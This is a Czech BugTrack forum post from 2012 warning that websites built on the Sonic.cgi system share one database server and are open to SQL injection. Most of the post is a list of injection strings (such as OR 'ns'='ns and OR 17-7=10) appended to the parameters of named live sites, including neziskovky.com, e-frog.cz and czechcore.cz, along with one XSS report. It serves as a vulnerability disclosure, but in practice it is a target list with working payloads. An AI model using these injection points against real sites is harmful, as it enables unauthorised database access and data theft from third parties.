web-stranky.cz SQLi v sonic.cgi

BugTrack

web-stranky.cz SQLi v sonic.cgi#
Varování před technologií Sonic.cgi, weby jsou spojené v jediný databázový server a jsou napadnutelné. Sonic.cgi obsahuje závažné chyby, které umožní vstup na databáze.
viz. google "vývojové prostředí Sonic.cgi"

Scanny z referencí na webu web-stranky.cz

Zde jsou SQLi:
neziskovky.com
report: [link]
[link] OR 'ns'='ns&page_include=w_sonic_cgi
[link] OR 'ns'='ns&page_include=p_top_messages_hi
story&p_top_messages_stranka=2
[link] OR 'ns'='ns&page_include=p_top_messages_re
actions&id_top_message=115440
[link] OR 'ns'='ns
[link] OR 'ns'='ns
[link] OR 'ns'='ns&reset=yes
[link] OR 'ns'='ns&p_top_messages_stranka=2
[link] OR 'ns'='ns&id_top_message=115440

vyhledavac.neziskovky.com
report: [link]
[link] OR 'ns'='ns&page_include=w_neziskovky&
reset=yes
[link] OR 'ns'='ns&page_include=w_sonic_cgi
[link] OR 'ns'='ns

e-frog.cz
report: [link]
[link] OR 'ns'='ns&page_include=p_block&block
_name=eshop_kontakt&param_res_2=kontakt
&reset=yes
[link] OR 'ns'='ns&page_include=p_eshop_kosik_det
&reset=yes
[link] OR 'ns'='ns&page_include=p_eshop_uvod&
id_anketa_vote=31&id_option=156
[link] OR 'ns'='ns
[link] OR 'ns'='ns&block_name=eshop_kontakt&p
aram_res_2=kontakt&reset=yes
[link] OR 'ns'='ns&id_anketa_vote=31&id_optio
n=156
[link] OR 'ns'='ns&param_res_2=kontakt&reset=
yes

czechcore.cz
report: [link]
[link] OR 'ns'='ns
[link] OR 'ns'='ns
[link] OR 'ns'='ns&reset=yes
[link] OR 'ns'='ns&page_include=p_block&block
_name=kontakty_crew
[link] OR 'ns'='ns&page_include=p_users_det&p
_users_det_new=y&reset=yes
[link] OR 'ns'='ns&block_name=kontakty_crew
[link] OR 'ns'='ns&p_users_det_new=y&reset=ye
s
[link] OR 'ns'='ns&page_include=p_publications_de
t&id_publication=78720
[link] OR 'ns'='ns
[link] OR 'ns'='ns&id_publication=78720
[link] OR 17-7=10

milicuvdumjaromer.cz
XSS report: [link]

(odpovědět)
sroub3k | E-mail4.2.2012 16:58

Zpět
 
 
 

 
BBCode